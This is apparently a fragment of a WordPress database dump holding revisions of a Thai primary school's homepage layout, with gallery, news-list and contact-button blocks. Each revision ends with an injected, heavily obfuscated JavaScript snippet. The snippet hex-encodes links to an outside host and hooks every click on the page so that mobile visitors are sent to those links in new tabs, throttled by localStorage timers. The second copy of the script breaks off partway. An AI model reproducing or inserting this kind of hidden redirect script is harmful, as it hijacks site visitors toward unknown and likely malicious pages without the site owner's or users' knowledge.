{\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":200},\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_f0d3cd-f6\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_f0d3cd-f6\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\"} /--></div>\n<!-- /wp:kadence/advancedbtn -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 10:45:57','2024-07-27 03:45:57','',14,'http://pakhaeng.ssk.in.th/?p=48',0,'revision','',0),
(49,1,'2024-07-27 10:46:59','2024-07-27 03:46:59','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":200},\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_f0d3cd-f6\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_f0d3cd-f6\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\"} /--></div>\n<!-- /wp:kadence/advancedbtn -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else 